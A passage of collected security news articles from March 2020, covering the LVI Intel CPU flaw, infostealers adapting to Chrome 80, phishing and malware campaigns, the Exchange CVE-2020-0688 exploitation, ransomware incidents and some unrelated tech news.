The attacker's value is transiently injected into code gadgets following the faulting load in the victim program.
Side channels may leave secret-dependent traces, before the processor detects the mistake and rolls back all operations.
Also, LVI is a lot harder to mitigate than previous Meltdown-type attacks because it needs expensive software patches that could potentially make Intel SGX enclave computations between two and 19 times slower.

How LVI works
How LVI works
Modern Intel processors affected, mitigations available
LVI affects Intel Core-family processors from Skylake onwards with SGX support and a list with all affected CPUs is provided by Intel here.

Icelake Core-family processors aren't affected by LVI, while Meltdown-resistant processors are "only potentially vulnerable to LVI-zero-data (aka loads exhibiting zero injection behavior only)."

Short term solutions for mitigating LVI have to be implemented to protect already deployed systems from potential attacks targeting this flaw.

"LVI necessitates compiler patches to insert explicit lfence speculation barriers which serialize the processor pipeline after potentially every vulnerable load instruction," the researchers say.

"Additionally and even worse, due to implicit loads, certain instructions have to be blacklisted, including the ubiquitous x86 ret instruction."

Even though software workarounds can be implemented, the root cause behind LVI cannot be fixed with software changes which means that new CPUs from affected processor families will need to come with hardware fixes.

Known side-channel and transient-execution attacks attack plane comparison
Known side-channel and transient-execution attacks attack plane comparison
"This is not a trivial attack to execute against a target, as several prerequisites have to be met," Bitdefender director of threat research Bogdan Botezatu told BleepingComputer. "This is not an average, run-of-the-mill malware attack that one would use against home users for instance."

"This is something that a determined threat actor, such as a hostile government-sponsored entity or a corporate espionage group would use against a high-profile target to leak mission-critical data from a vulnerable infrastructure.

"Although difficult to orchestrate, this type of attack would be impossible to detect and block by existing security solutions or other intrusion detection systems and would leave no forensic evidence behind."

Researchers have identified a new mechanism referred to as Load Value Injection (LVI). Due to the numerous complex requirements that must be satisfied to successfully carry out, Intel does not believe LVI is a practical method in real world environments where the OS and VMM are trusted. New mitigation guidance and tools for LVI are available now and work in conjunction with previously released mitigations to substantively reduce the overall attack surface. We thank the researchers who worked with us, and our industry partners for their contributions on the coordinated disclosure of this issue. - Intel

An academic research paper including more technical information regarding LVI is available here in PDF format and it will be presented in May 2020 at the 41st IEEE Symposium on Security and Privacy (IEEE S&P'20).

Proof of concept code detailing LVI attack applications is available on GitHub and Intel has also published a white paper here.

A video presenting demos of two LVI (Load Value Injection) proof of concept attacks is embedded below.

Update: Added Intel's statement.


Malware Unfazed by Google Chrome's New Password, Cookie Encryption
14.3.2020 
Bleepingcomputer  Virus

Google's addition of the AES-256 algorithm to encrypt cookies and passwords in the Chrome browser had a minor impact on infostealers.

Faced with the threat of having their business disrupted, developers of malware that steals data from web browsers quickly updated their tools to overcome the hurdle, many of their offers highlighting support for the new Chrome.

Even AZORult, abandoned by its original author in 2018, has received code updates from actors who continued the project to make it compatible with Chrome 80

New infostealing software trying to earn its stripes on cybercriminal forums also jumped at the opportunity, being advertised with out-of-the-box support for the new encryption layer added to Google Chrome.

Before Chrome 80
Google rolled out Chrome 80 in early February and, until its release, cookies and passwords on Windows were encrypted using the DPAPI built into the operating system.

Raveed Laeb, product manager at cyber intelligence company KELA, told BleepingComputer that Chrome still relies on the old method but added a new layer on top of it.

The data is first encrypted with the AES standard, though, and the key is then encrypted using the CrypProtectData DPAPI function. Reverting the process and obtaining the AES-256 key is done with the CryptUnprotectData function.

Replying to BleepingComputer, Google explained the reason for making this change, which affected infostealers for a short while:

"With M80, we made changes that will allow us to isolate Chrome’s network stack into its own robustly sandboxed process. As part of those changes we changed the algorithm for encrypted passwords/cookies and changed the storage mechanisms, which also disrupted the tooling that data thieves currently rely on."

Minor setback for malware
While Chrome adding AES encryption for cookies and passwords created ripples in the malware world, the disturbance was short-lasting for most malicious tools.

Soon after the new Chrome emerged, updates were publicly announced for at least four infostealers that had adapted to the new mechanism and had no trouble collecting the protected information.

The author of KPot infostealer posted four days after the new Chrome emerged that they had figured out the algorithm and would implement the fix in the tool.

In a subsequent post on the same day, they announced that an updated version was available for $90.


The authors of Raccoon, an infostealer that can grab data from nearly 60 apps - including all popular web browsers - announced that they, too, managed to bypass the new security layer in Chrome 80.

An update to their tool clearly specifies support for the latest version of the browser from Google and that the new features would become available with the new Raccoon build.

The release of the update would not affect the old builds, though, which would continue to work as originally designed.


Developers introducing new tools in the game seized the chance to grab some attention by promoting support for Chrome 80. Sleuthing from KELA uncovered an ad on a Russian cybercrime forum for Redline, a newcomer on the scene of infostealers.

"It's important to note that Redline is very new - offered for sale only after the new Chrome update, and hence doesn't have a lot of reputation," Laeb told BleepingComputer.

It is likely that the authors were using the Chrome update as a selling point since it was introduced with support for the new browser version.


AZORult is not dead, just in limbo
One of the top 10 active malware strains in 2019, AZORult also followed suit.

Left unattended by its original author in December 2018, the AZORult project was picked up by various authors and continues to be active to this day.

Genesis, one underground shop for browser data kept using the original version of the malware and suffered grave losses when Chrome 80 came along, as uncovered by KELA researchers towards the end of February.

Genesis administrators are believed to run a malware-as-a-service business, distributing the original version of AZORult and selling the collected data through their market.

"It's a business model that we see expanding constantly for the past two years or so, as it allows them to be very scalable and peddle hundreds of thousands of infections." - Raveed Laeb, product manager at KELA

Many believed AZORult's final day had come and rushed to write its obituary, explaining in it the change Google added to Chrome.


Version 3.3.1 should have been the last we saw of AZORult. But some threat actors had a different plan and kept the malware alive through multiple offshoots.

These did not come from vetted developers, though, and gained little traction. Cybercriminals were wary of using them for fear of being tampered with.

AZORult++ was first reported in May, 2019, and the announcement of the malware's version 3.4 was spotted recently


Several variants of this infostealer exist and one of them boasts compatibility with Chrome 80, updated not long ago.

This version was announced at the beginning of March. Being from an unvetted source, this version is not largely adopted, despite AZORult's notoriety, but could be used in smaller campaigns.



Chrome 80 did stir the waters of infostealers but most of them discovered how to work with the added encryption layer fairly quickly. Activity from this type of malware is unlikely to subside any time soon.

In fact, a new campaign delivering Raccoon via a new variant of the sextortion scam was reported today by security researchers from IBM X-Force Threat Intelligence.


Google Play Protect Miserably Fails Android Protection Tests
14.3.2020 
Bleepingcomputer  Android

Google's Play Protect Android mobile threat protection system failed German antivirus testing lab AV-Test real-world tests, scoring zero out of a maximum of six points after very weak malware detection performance.

The Google Play Protect built-in malware protection for Android was introduced three years ago, during the Google I/O 2017 in May 2017, with Google starting full deployment to all Android devices during July 2017.

Today, Google's Play Protect is deployed on over 2.5 billion active Android devices as shown by the Android security center.

AV-Test rankings
Android security app final rankings (AV-Test)
Anything else but Google Play Protect
According to AV-Test's results, Google Play Protect was able to detect a little over one-third of the roughly 6,700 malware samples the testing lab used throughout the tests which means that more than 4,000 of them were able to infect the test devices.

Google Play Protect detected 37% of 3,300 newly discovered samples — not more than 2 to 24 hours old — in the real-time testing phase, and 33.1% in the reference set test that used 3,300 malware samples that have been circulating for up to 4 weeks.

As can be seen in the below screenshot, both results are the last in the rankings, with all other mobile antivirus security solutions having detection rates above 98% in both protection tests.

Google Play Protect also had issues with false alarms as it mistakenly tagged about 30 harmless applications as being a threat to the test devices.

AV-Test Android security tests
Android malware detection rates (AV-Test)
Actually, out of all mobile security suites, Antiy, Bitdefender, Cheetah Mobile, NortonLifeLock, Trend Micro, and Kaspersky hit a perfect 100% detection rate.

"With Play Protect, Google promises protection against infected programs," AV-Test says. "That's why the tool runs automatically on every newer Android system, scanning available apps."

"The current test indicates, however, that Android users should not rely solely on Play Protect," the testing lab adds.

"As the detection rates of Google Play Protect are really quite poor, the use of a good security app is highly recommended."

AV-Test's comparison only evaluated Android security apps for consumers, with the lab to test enterprise security apps and release the results in April 2020.

This is not the first time Android's built-in security app failed AV-Test's examination given that Google Play Protect was also at the bottom of the protection rankings far beyond the other mobile security tools in October 2017, right after its release.

100 billion apps scanned every day
According to Google, Play Protect scans over 100 billion apps for malware each day, up 50 billion when compared to 2018 and it provides Android users with information regarding potential security issues and the actions needed to keep their devices secure.

Last year, Google joined efforts with ESET, Lookout, and Zimperium through the App Defense Alliance to improve malicious Android app detection on submission and block such apps before getting published on the Play Store.

The App Defense Alliance couldn't have come sooner seeing that that malware has managed to infiltrate Google's app ecosystem quite often despite the company's efforts to stop it. (1, 2, 3)

Google also enhanced the machine-learning detection systems used by Google Play Protect to analyze Android app code, metadata, and user engagement signals for suspicious content and behavior.

BleepingComputer has reached out to Google for comment but had not heard back at the time of this publication.


Intricate Phishing Scam Uses Support Chatbot to ‘Assist’ Victims
14.3.2020 
Bleepingcomputer  Phishing

An intricate phishing scam is utilizing a "customer service" chatbot that walks its victims through filling out the various forms so that the attackers can steal their information, credit card numbers, and bank account information.

A new phishing scam that was recently found by MalwareHunterTeam is targeting Russian victims and pretending to be a refund of 159,700 ($2,100) for unused Internet and cellular services.

What makes the phishing scam so interesting is that it utilizes a chat bot that pretends to be a customer service agent to walk the victim through a series of screens and the information that they need to provide.

Support Represenative guiding you through phishing scam
"Support Representative" guiding you through a phishing scam
After submitting requested information such as the victim's name, address, last four digits of passport number, and payment details, the fake support rep tells the victim that something strange has happened as their information cannot be found in the system.

It then asks the victim to resubmit the information.

Working on a double-verify on the entered information
Working a double-verify on the entered information
This acts as a double-verify by the scammers to make sure that the victim is submitting the correct information. Even if you submit different information the second time, the chatbot will come back on and say your record was found.

Victim's info has been found and they can proceed
Victim's info has been found and they can proceed
It then proceeds to redirect the victim to another phishing site under the attacker's control where they request they provide their name, phone number, and credit card info.

Steal victim's credit card information
Steal victim's credit card information
The credit card information that is entered will be verified using a variety of different methods depending on what was entered. This allow the attackers to capture accurate credit card info from the victim.

At the end of the scam, the attackers have a victim's email address, phone number, name, credit card info, and the last four digits of their passport number.

This is enough to perform identity theft, gain access to accounts via customer support numbers, and other malicious activity.

As always, never submit information on any site without first confirm that you are at the correct URL for the service being offered.

Furthermore, if you are being offered a refund for any service, contact that service directly to confirm it is not a scam before filling out any related information.


NSA Warns About Microsoft Exchange Flaw as Attacks Start
14.3.2020 
Bleepingcomputer  BigBrothers

The U.S. National Security Agency (NSA) warned about a post-auth remote code execution vulnerability in all supported Microsoft Exchange Server servers via a tweet published on the agency's Twitter account.

NSA's tweet reminded followers to patch the CVE-2020-0688 vulnerability which would enable potential attackers to execute commands on vulnerable Microsoft Exchange servers using email credentials.

Microsoft patched this RCE security flaw as part of the February 2020 Patch Tuesday and tagged it with an "Exploitation More Likely" exploitability index assessment hinting at CVE-2020-0688 being an attractive target for attackers.

State-backed hackers already attacking Microsoft Exchange servers
The same day, researchers at security firm Volexity confirmed that exploitation of this security flaw has begun in late February, with several organizations already having had their networks compromised after state-backed advanced persistent threats (APT) groups exploited the CVE-2020-0688 flaw.

"Volexity has also observed multiple concerted efforts by APT groups to brute-force credentials by leveraging Exchange Web Services (EWS) in an effort to likely exploit this vulnerability," their report says.

"Volexity believes these efforts to be sourced from known APT groups due to IP address overlap from other attacks and, in some cases, due to the targeting of credentials that would only be known from a previous breach."

Volexity
@Volexity
Active exploitation of Microsoft Exchange servers by APT actors via the ECP vulnerability CVE-2020-0688. Learn more about the attacks and how to protect your organization here: https://www.volexity.com/blog/2020/03/06/microsoft-exchange-control-panel-ecp-vulnerability-cve-2020-0688-exploited/ …#dfir #threatintel #infosec

View image on Twitter
94
12:22 AM - Mar 7, 2020
Twitter Ads info and privacy
64 people are talking about this
A U.S. Department of Defense (‎DoD) source also confirmed the ongoing attacks to ZDNet, although, just like Voxelity, it didn't name the groups or the countries behind them.

As BleepingComputer previously reported, scans for unpatched Microsoft Exchange servers have started on February 25, the same day Zero Day Initiative security researcher Simon Zuckerbraun published a report on CVE-2020-0688.

After his report, a new module targeting this flaw was added by Rapid7 to the Metasploit pen-testing tool following multiple proof-of-concept exploits having surfaced on GitHub.

Sigma rules for SIEM systems provided by Nextron Systems's Florian Roth are available for detecting exploitation attempts against unpatched Exchange servers.

Microsoft Exchange Server RCE vulnerability
As Zuckerbraun explained, "any outside attacker who compromised the device or credentials of any enterprise user would be able to proceed to take over the Exchange server."

"Having accomplished this, an attacker would be positioned to divulge or falsify corporate email communications at will," he added. "Accordingly, if you’re an Exchange Server administrator, you should treat this as a Critical-rated patch and deploy it as soon as your testing is complete."

The actively exploited vulnerability was found in the Exchange Control Panel (ECP) component and it is caused by Exchange's failure to create unique cryptographic keys when installed.

After successfully exploited, it allows authenticated attackers to execute code remotely with SYSTEM privileges and fully compromise the exploited server.

Links to the security update descriptions for vulnerable Microsoft Exchange Server versions and download links are available in the table below:

Product Article Download
Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 4536989 Security Update
Microsoft Exchange Server 2013 Cumulative Update 23 4536988 Security Update
Microsoft Exchange Server 2016 Cumulative Update 14 4536987 Security Update
Microsoft Exchange Server 2016 Cumulative Update 15 4536987 Security Update
Microsoft Exchange Server 2019 Cumulative Update 3 4536987 Security Update
Microsoft Exchange Server 2019 Cumulative Update 4 4536987 Security Update
"Fortunately, this vulnerability does require a compromised credential to exploit and, as a result, will stave off widespread automated exploitation such as those that often deploy cryptocurrency miners or ransomware," Voxelity said.

"However, more motivated attackers now have a way to compromise a critical piece of the IT infrastructure if it is not updated."

Since no mitigating factors have been identified for this vulnerability according to Microsoft, the only choice left is to patch your servers — if you're not willing to reset all users' passwords to render all previously stolen credentials useless — before hackers will get to them and manage to fully compromise your entire network.


Malware Spread as Nude Extortion Pics of Friend's Girlfriend
14.3.2020 
Bleepingcomputer  Spam  Virus

Attackers have recently warped sextortion scams into baits used to infect their targets with Raccoon information stealer malware designed to help steal credentials, credit card information, desktop cryptocurrency wallets, and more.

Emails using this new method of luring targets into infecting themselves with Raccoon payloads are distributed in parallel with a more conventional DocuSign campaign.

The same series of attacks was that previously used by the attackers to distribute Predator The Thief info stealer malware via Uber, UPS, QuickBooks, and Secure Parking themed spam.

Sextortion campaign failure used as a lure
As IBM X-Force Threat Intelligence researchers discovered, the attackers are now luring victims using emails promising to give access to the nude extortion pics of a friend's girlfriend.

These emails have a variety of subjects, such as "Mail belonging to your colleague has been stolen," "Private info belonging to your friend has been stolen", "Your colleague’s account was compromised," or "We have got access to your friend’s account."

In the emails, the attackers who claim to be the "Red Skull hacker crew" say that they have access to a friend's email account were they found "images of this naked girlfriend and demanded five hundred dollars for them."

"In the event that he will ignore us, we guaranteed him that we will send these photos to everyone of his contacts," the messages add. "Regrettably, he has not paid, and because you were on his contact list, you obtained this mail. You will find these pix attached to this message."

Phishing email sample (IBM X-Force)
Phishing email sample (IBM X-Force)
By playing the failed sextortion scam card, the campaign's operators attempt to tempt their potential victims to open a malicious attachment with a blurred image that requires them to enable content to be viewed.

Of course, after doing that, the malware payload will be deployed on their computers via embedded macros that run a Powershell command which downloads and installs the Raccoon info stealer.

At the moment, the domain used to deliver the info stealer payloads has been taken down according to IBM X-Force Threat Intelligence researchers, although the campaign's operators might soon switch to another one to keep the attacks going.

By promising to deliver photos of a friend's naked girlfriend, the scammers appeal to the curiosity of their targets which, in many cases, might be a more successful method of incentivizing them to open a malicious attachment than making threats.

Sextortion malicious attachment
Sextortion malicious attachment
The Raccoon info stealer
Raccoon (aka Legion, Mohazo, and Racealer) is information-stealing malware distributed under the MaaS (malware-as-a-service) model for $75/week or $200/month.

The info stealer is delivered via exploit kits, phishing, and PUA (potentially unwanted applications), and it was first spotted almost a year ago on cybercriminal forums being advertised as malware capable of stealing a wide range of data including but not limited to email credentials, credit card info, cryptocurrency wallets, browser data, and system information.

A report from CyberArk says that Raccoon is capable of dig it's way into about 60 different applications, from browsers, cryptocurrency wallets, email and FTP clients to steal and deliver sensitive information to its operators.

Stolen date prepared for exfiltration - CyberArk
Stolen date prepared for exfiltration (CyberArk)
Raccoon can also be configured to take snapshots of the compromised devices' screens, as well as drop secondary payloads as part of multi-stage attacks.

Recorded Future and Cybereason Nocturnus both said that Raccoon was one of the best-selling malware during 2019 and that it was used to infect hundreds of thousands of systems even though it lacks both sophistication and innovative features.


Folding@Home Wants Your CPU Cycles for Coronavirus Research
14.3.2020 
Bleepingcomputer  IT

The Folding@home distributed computing project is now utilizing donated CPU cycles to research the Coronavirus (COVID-19) virus.

Folding@home is a project founded by Pande Lab at Stanford University where users donate CPU cycles through a software client to simulate protein folding, computational drug design, and other types of molecular dynamics to learn more about diseases and how to protect against them.

At the end of February, the Folding@home project announced that they are joining other COVID-19 researchers around the world to learn more about the virus and create potential drug therapies.

"By downloading Folding@Home, you can donate your unused computational resources to the Folding@home Consortium, where researchers working to advance our understanding of the structures of potential drug targets for 2019-nCoV that could aid in the design of new therapies. The data you help us generate will be quickly and openly disseminated as part of an open science collaboration of multiple laboratories around the world, giving researchers new tools that may unlock new opportunities for developing lifesaving drugs," the Folding@home project stated in a blog post.

If you have a computer laying around not doing anything after the SETI@home projected stopped sending work or want to donate your active computer's idle CPU processing power to researching the COVID-19 virus, you can do so by downloading and installing the Folding@home client.

Once installed, right-click on the Folding@home icon in your Windows system tray to configure how much CPU power you wish to donate. The intensity of your CPU utilization can be set to 'Full', 'Medium', or 'Light', with Light being the lightest CPU load.

Folding@home options
Folding@home options
If you plan on using your computer while donating cycles, I recommend you select the 'Light' option.

If you want to control Folding@home using a web interface, you can select the 'Web Control' option as shown in the image above. This will open a web page showing your current work-in-progression, your settings, and the project you are contributing are your CPU cycles to.

Folding@Home
Folding@Home
If you are configured to support research fighting 'Any Disease' then your CPU cycles will be randomly select among different projects, including Coronavirus/COVID-19 research.

You can determine what project you are contributing to by looking at the project number and looking it up here.

If you are contributing to projects 11741, 11742, or 11743 then your donated CPU cycles are being used for Coronavirus research.


Windows 10 PowerToys Excitement Builds as New Toys Announced
14.3.2020 
Bleepingcomputer  OS

There are a lot of reasons to resize a photo. You may want to set a different aspect ratio for all your photos and you may just want to cut out unnecessary parts of a photo and reduce its size and save your computer's disk space.

Back in the old days, Windows 95 shipped with PowerToys, which allowed users to resize multiple images. And the PowerToys' Image Resizer feature appears to be making a comeback on Windows 10 later this year.

In the release notes of PowerToys v15, which only contained bug fixes, Microsoft confirmed that the company is working on Image Resizer toy. The details are not yet available, but the feature would be similar to the likes of Windows 95's Image Resizer.

In addition to Image Resizer, Microsoft is also working on PowerLauncher to let you search and launch your app instantly. Unlike Windows 10's built-in Search feature, PowerLauncher comes with a very simple user interface and it also features auto-complete search bar.

PowerLauncher

PowerLauncher is aimed to be faster than Windows Search for showing local search results and apps.

Another PowerToy is being developed to help users remap the keys on their keyboards and also rearrange the system shortcuts.

“For developers and some seasoned users, where using their keyboard is a large part their job, ability to remap keystrokes and engage executables can lead tomassive gains in time. In fact, this was the second most popular topic measured through thumbs up and the most commented issue in the PowerToys Github,” Microsoft said.

Microsoft is planning to release these new PowerToys at some point in 2020.


Twitter First: Trump Video Retweet Tagged as 'Manipulated Media'
14.3.2020 
Bleepingcomputer  Social
For the first time, Twitter has labeled a video as 'Manipulated Media' that attempts to portray Joe Biden as stating that Donald Trump should be re-elected.

In a video tweeted by White House social media director Dan Scavino, it looks as if Joe Biden is saying that "We can only re-elect Donald Trump."

In reality, though, this video has been deceptively cut short to fit this message when in fact Biden stated "We can only re-elect Donald Trump if in fact we get engaged in this circular firing squad here. It's got to be a positive campaign, so join us."

Dan Scavino

@DanScavino
· Mar 8, 2020
Sleepy Joe💤in St. Louis, Missouri today:

“We can only re-elect @realDonaldTrump.”#KAG2020LandslideVictory🇺🇸

Embedded video

Josh Jordan

@NumbersMuncher
The full video is just a little different.

You'd think snowflakes who whine about fake news would be more careful before spreading... fake news.
Embedded videoEmbedded video
628
6:03 PM - Mar 8, 2020
Twitter Ads info and privacy
214 people are talking about this
After this video started heavily circulating on social networks and amassing over 6 million views on Twitter, Washington Post's Cat Zakrzewski noticed that for the first time Twitter applied its 'Manipulated Media' label to the video.

Twitter Manipulated Media
Twitter Manipulated Media
This 'Manipulated Media' label is part of Twitter's new guidelines and approach to synthetic and manipulated media being shared on the social network. Twitter has told BleepingComputer that these guidelines went into effect on March 5th, 2020.

Tweets that share synthetic and manipulated media are subject to removal under this policy if they are likely to cause harm. Some specific harms we consider include:

Threats to the physical safety of a person or group
Risk of mass violence or widespread civil unrest
Threats to the privacy or ability of a person or group to freely express themselves or participate in civic events, such as: stalking or unwanted and obsessive attention;targeted content that includes tropes, epithets, or material that aims to silence someone; voter suppression or intimidation
Under these guidelines, if a shared media is significantly and deceptively altered or fabricated, they will use the following checklist to determine if it should be labeled as 'Manipulated Media' or removed outright.

Handling deceptive media on Twitter
Handling deceptive media on Twitter
Twitter is not the only one labeling this video as deceptive, as Zakrzewski later found that Facebook has now also labeled the video on their platform as "Partly False Information".

Facebook marking video as 'Partly False Information'
Facebook marking video as 'Partly False Information'
According to Twitter, due to a technical issue, the 'Manipulated Media' label is only being displayed when the tweet is shown in a timeline and are working on a for this issue.


Ryuk Ransomware Behind Durham, North Carolina Cyberattack
14.3.2020 
Bleepingcomputer  Ransomware

The City of Durham, North Carolina has shut down its network after suffering a cyberattack by the Ryuk Ransomware this weekend.

Local media reports that the city fell victim to a phishing attack that ultimately led to the deployment of the Ryuk Ransomware on their systems.

"According to the SBI, the ransomware, named Ryuk, was started by a Russian hacker group and finds its way into a network once someone opens a malicious email attachment. Once it's inside, Ryuk can spread across network servers through file shares to individual computers," reported.

To prevent the attack from spreading throughout their network, the City of Durham has "temporarily disabled all access into the DCI Network for the Durham Police Department, the Durham Sheriff’s Office and their communications center".

This has caused the city's 911 call center to shut down and for the Durham Fire Department to lose phone service. 911 calls, though, are being answered.

While they have not seen signs that data has been stolen, the city has warned that users should be on the lookout for phishing emails pretending to be from the City of Durham.

Actors were probably present on the network for weeks
The Ryuk Ransomware attacks are usually the result of a network becoming infected with the TrickBot Trojan first, which is usually installed through malicious attachments in phishing emails.

TrickBot is an information-stealing Trojan that will steal data from an infected computer and then attempt to spread laterally through the network.

After harvesting all valuable data from a network, it then proceeds to open a shell back to the Ryuk Ransomware actors who will then proceed to harvest data from the network as well and gain administrator credentials.

When done, they deploy the Ryuk Ransomware on all devices on the network to generate a large ransom, which can range from $10,000 on very small networks to millions of dollars on larger networks.

In December 2019, the Ryuk Ransomware was behind the attack on New Orleans and just recently attacked legal services giant Epiq Global, which caused them to take all of their systems offline as well to contain the infection.


Google Stops Issuing Security Warnings About Microsoft Edge
14.3.2020 
Bleepingcomputer  Security

Google has toned down its rhetoric by no longer displaying a security warning on its extension store to Microsoft Edge users that tells them to switch to Chrome to be more secure.

As the new Microsoft Edge is based on Chromium, browser extensions designed for Google Chrome are also compatible with Microsoft's new Edge browser.

Starting last month, Microsoft Edge users visiting the Chrome Web Store were greeted with a yellow alert stating that they should switch to Chrome to "use extensions securely".

Google warning to Microsoft Edge Users
Google warning to Microsoft Edge Users
As Microsoft Edge and Google Chrome run extensions in the same manner, this looked to many like Google was just taking shots at Microsoft's new browser out of fear of losing market share.

Google, though, told BleepingComputer that they are displaying this alert because Microsoft Edge does not support Google's Safe Browsing Feature.

As this feature is used by the Chrome team to pull malicious extensions, Microsoft Edge users would not have the benefit of this security feature and would continue to use the malicious extension.

While true, their alert could have been worded better to indicate the lack of this protection rather than implying that Microsoft Edge is less secure.

Google must have realized that their alert was not making them look so good and is no longer displaying it to Microsoft Edge users.


New US Bill Aims to Protect Researchers who Disclose Govt Backdoors
14.3.2020 
Bleepingcomputer  BigBrothers  Virus

New legislation has been introduced that amends the Espionage Act of 1917 to protect journalists, whistleblowers, and security researchers who discover and disclose classified government information.

The goal of the new legislation is to amend the Espionage Act of 1917 so it cannot be used to target reporters, whistleblowers, and security researchers who discover and publish classified government secrets.

Concerned that the current laws are being used for partisan prosecution, U.S. Representative Ro Khanna (D - California) introduced the new legislation to Congress on March 5th, 2020 and U.S. Senator Ron Wyden (D - Oregon) will soon introduce it to the Senate.

"My bill with Senator Wyden will protect journalists from being prosecuted under the Espionage Act and make it easier for members of Congress, as well as federal agencies, to conduct proper oversight over any privacy abuses. Our nation’s strength rests on the freedom of the press, transparency, and a functioning system of checks and balances. This bill is a step toward ensuring those same principles apply to intelligence gathering and surveillance operations," said Rep. Ro Khanna.

"This bill ensures only personnel with security clearances can be prosecuted for improperly revealing classified information," Senator Wyden stated.

This new legislation titled 'Espionage Act Reform Act of 2020’ ensures:

Journalists who solicit, obtain, or publish government secrets are safe from prosecution.
Every member of Congress is equally able to receive classified information, specifically from whistleblowers. Current law criminalizes the disclosure of classified information related to signals intelligence to any member of Congress, unless it is in response to a “lawful demand” from a committee. This change puts members in the minority party and those not chairing any committee at a significant disadvantage toward conducting effective oversight.
Federal courts, inspector generals, the FCC, Federal Trade Commission, and Privacy & Civil Liberties Oversight Board can conduct oversight into privacy abuses.
Cybersecurity experts who discover classified government backdoors in encryption algorithms and communications apps used by the public can publish their research without the risk of criminal penalties. The bill correctly places the burden on governments to hide their surveillance backdoors; academic researchers and other experts should not face legal risks for discovering them.
With these new amendments, security researchers are also protected from revealing classified government surveillance backdoors that have been added to encryption algorithms and communications apps that are utilized by the public.

Hacking into government systems or unlawfully obtaining nonpublic government information, though, is still off-limits and would lead to prosecution.

With these changes, researchers would be able to analyze government mobile apps, communication protocols, and algorithms and disclose any vulnerabilities and backdoors without fear of prosecution.

The current legislation can be found in chapter 37 of title 18, United States Code and the proposed amendments can be read here.

Senator Wyden has also released a summary of the bill/FAQ that provides an overview as to why the legislation is being introduced and answers some commonly asked questions.


How to Use Google Chrome Extensions and Themes in Microsoft Edge
7.3.2020 
Bleepingcomputer  Security

Microsoft's new Edge browser is now available and it comes with an add-on store where you can find Microsoft-approved extensions. As Edge is built on the same Chromium code base, it can also access the Chrome Web Store.

In addition to Microsoft's selection of extensions, you can also download the large selection of Chrome extensions in Edge. Like extension, Edge is also getting support for Chrome themes and you can try it in the Canary builds of the browser.

In this article, we're going to walk you through steps to download and install Chrome extensions and themes in Edge.

Add Chrome extensions to Microsoft Edge
To install Chrome extensions in Edge, follow these steps:

Open Edge (Stable, Beta, Dev or Canary) and click on three dots icon to open its menu.
Once you’ve opened Edge menu, select “Extensions”
In Edge's extension tab, turn on the option “Allow extensions from other stores”.
Chrome extensions

You'll need to click Allow in a pop-up window to confirm that you want to install Chrome extensions in your Edge browser.
Now you can visit the Chrome store and install any extension that you want.

Add Chrome themes to Microsoft Edge
In Edge Canary, you can also install Chrome themes after enabling an experimental flag feature:

In Edge's address bar, type Edge://flags
Edge

Now search for 'Allow installation of external store themes' and locate the flag with this name.
Enable the flag and relaunch the browser.
You can now head to the Chrome store and install themes.

Any installed theme can be removed by going to Edge settings > Appearance > Custom theme.


Data-Stealing FormBook Malware Preys on Coronavirus Fears
7.3.2020 
Bleepingcomputer  Spam

Another email campaign pretending to be Coronavirus (COVID-19) information from the World Health Organization (WHO) is distributing a malware downloader that installs the FormBook information-stealing Trojan.

With the fears of Coronavirus in full swing, malware distributors are preying on these fears by sending emails that pretend to be the latest updates on the Coronavirus disease outbreak.

These emails contain a ZIP file attachment and state it's from the 'World Health Organization' with information about the latest "Coronavirus Updates". When viewing this email in a mail client, they do not display very well as seen below.

Coronavirus Spam
Coronavirus Spam
The emails will, though, prompt you to view the email in a browser, which properly displays the content of the email.

This content pretends to be latest updates on the Coronavirus outbreak and lists various stats, contains an email of corona-virus@caramail.com that is used for further phishing purposes, and prompts you to view the attached 'MY-HEALTH.PDF' file for 'the simplest and fastest ways to take of your health and protect others'.

Viewing email in a browser
Viewing email in a browser
This ZIP file attachment contains an executable called MyHealth.exe, which the malware distributors are trying to pass off as the MyHealth.PDF file they mention in the email. They are not, though, doing a convincing job as they use a generic executable icon.

Mail Attachment
Mail Attachment
According to MalwareHunterTeam who discovered this spam campaign, the executable is GuLoader, which is a malware downloader.

Once executed, GuLoader will download an encrypted file from https://drive.google.com, decrypt it, and then inject the malware into the legitimate Windows wininit.exe process to evade detection.

The downloaded malware is the FormBook information-stealing Trojan, which FireEye states will attempt to steal the contents of the Windows clipboard, log what you type into the keyboard, and steal data while you are browsing the web.

"The malware injects itself into various processes and installs function hooks to log keystrokes, steal clipboard contents, and extract data from HTTP sessions. The malware can also execute commands from a command and control (C2) server. The commands include instructing the malware to download and execute files, start processes, shutdown and reboot the system, and steal cookies and local passwords."

Using this malware, attackers can steal banking credentials, web site login credentials, cookies that allow them to logon to sites as the victim, and the contents of the Windows clipboard.

This means that those who are infected with this malware face significant risk to identity theft, online banking theft, and the compromise of other accounts that they normally log into.

If you have recently received an email claiming to be from the WHO about Coronavirus and it contains an attachment that you opened, it is strongly advised that you scan your computer with antivirus software as soon as possible.

Protecting yourself from Coronavirus scams
When receiving emails, you should never open any attachments unless you confirm the sender.

This means that you should call the sender to confirm they sent the email or at least discuss the attached email with your network administrator to determine if the attachment is safe.

The World Health Organization has also issued an alert to be on the lookout for criminals trying to impersonate them and that they will:

never ask you to login to view safety information
never email attachments you didn’t ask for
never ask you to visit a link outside of www.who.int
never charge money to apply for a job, register for a conference, or reserve a hotel
never conduct lotteries or offer prizes, grants, certificates or funding through email
never ask you to donate directly to emergency response plans or funding appeals.
If you receive an email claiming to be from the WHO and it has an attachment, simply mark it as spam and delete it.


Ransomware Threatens to Reveal Company's 'Dirty' Secrets
7.3.2020 
Bleepingcomputer  Ransomware

The operators of the Sodinokibi Ransomware are threatening to publicly share a company's "dirty" financial secrets because they refused to pay the demanded ransom.

As organizations decide to restore their data manually or via backups instead of paying ransoms, ransomware operators are escalating their attacks.

In a new post by the Sodinokibi operators to their data leak site, we can see that attackers are not only publishing victim's data but also sifting through it to find damaging information that can be used against the victim.

Entry on Ransomware data leak site
Entry on Ransomware data leak site
In the above post, the attackers are threatening to sell the Social Security Numbers and date of births for people in the data to other hackers on the dark web.

They also intimate that they found "dirty" financial secrets in the data and threaten to disclose it.

"It is only a small part of your data and it’s in picture for now. Every day more and more information will be uploaded.
SSN + DOB + other information about people - will be sold in DarkWeb to people who will use them for their probably “dark deals”.
After revealing people’s personal data, they will be informed who is guilty in publications.
There is also other interesting information. Your financial reports are very interesting and “dirty” - these secrets will be revealed a little later to certain people."

These new extortion attempts further illustrate how victims need to treat ransomware attacks very seriously.

It is no longer only about getting your data back, but also the risk of very private and personal data being exposed and sold to other attackers.

